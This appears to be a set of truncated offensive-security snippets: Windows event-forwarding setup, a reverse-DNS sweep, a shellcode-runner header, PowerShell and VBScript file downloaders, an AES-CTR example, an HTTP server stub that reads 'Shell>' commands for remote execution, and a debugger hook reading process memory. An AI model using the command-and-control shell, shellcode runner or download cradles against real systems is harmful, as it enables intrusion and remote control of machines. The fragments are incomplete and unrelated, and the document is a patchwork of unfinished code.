```xml
<Subscription xmlns="http://schemas.microsoft.com/2006/03/windows/events/subscription">
  <SubscriptionId>Domain Computer Events</SubscriptionId>
  <SubscriptionType>SourceInitiated</SubscriptionType>
  <Description>Important Domain Controller Events</Description>
  <Enabled>True</Enabled>
  <Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
  <ConfigurationMode>MinLatency</ConfigurationMode>
  <Query>
    <![CDATA[<QueryList>
      <Query Id="0" Path="Security">
```
```powershell
#Collector:
#Setting WinRM service to automatic start and running quickconfig
Set-Service -Name WinRM -StartupType Automatic
Start-Service -Name WinRM
winrm quickconfig -quiet
#Set the size of the forwarded log
wevtutil sl forwardedevents /ms:1000000000
```
```bash
#!/bin/bash
rangeIp=""
for i in `seq 1 1 254`;
do
    ip=$rangeIp.$i
    #echo $ip
    host $ip | grep "pointer";
done
```
```bash
#!/bin/bash
#######################################
# Penetration testing toolset
#######################################
apt-get update
apt-get upgrade -y
#apt-get install whois -y
#apt-get install curl -y
#apt-get install wget -y
```
```python
#!/usr/bin/python
##############################################################
# PyInstaller Win32 shellcode runner - by @mihi42
#
# Needed software:
# * Python 2.7.2 from
#   <http://www.python.org/download/releases/>
# * PyWin32 build 217 for Python 2.7 from
#   <http://sourceforge.net/projects/pywin32/files/pywin32/>
```
```powershell
$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = ""
$file = ""
$webclient.DownloadFile($url,$file)
```
```vbscript
strUrl = WScript.Arguments.Item(0)
StrFile = Wscript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts
Err.Clear
```
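```python
import binascii
import os
from Crypto.Cipher import AES
from Crypto.Util import Counter
# Random 128-bit starting value for the CTR counter block
counter = os.urandom(16)
# AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.
key = os.urandom(32)
# AES Encrypt
# CTR mode needs a counter that changes for every block; a callable that
# returns the same value each time reuses one keystream block for the whole message.
ctr = Counter.new(128, initial_value=int(binascii.hexlify(counter), 16))
enc = AES.new(key, AES.MODE_CTR, counter=ctr)
encrypted = enc.encrypt(b"Secret")
```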
```python
# HTTP SERVER
#--------------------------------------------
import BaseHTTPServer
import os, cgi
HOST_NAME = '172.16.20.201'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(s):
        command = raw_input("Shell> ")
```
```python
from winappdbg import Debug, EventHandler, System, Process
import sys
# this is the call back function
def YYYY( event, ra ,arg1 ,arg2, arg3):
    # read 1 KB of the memory content
    print process.read( arg2,1024 )
class MyEventHandler( EventHandler ):
```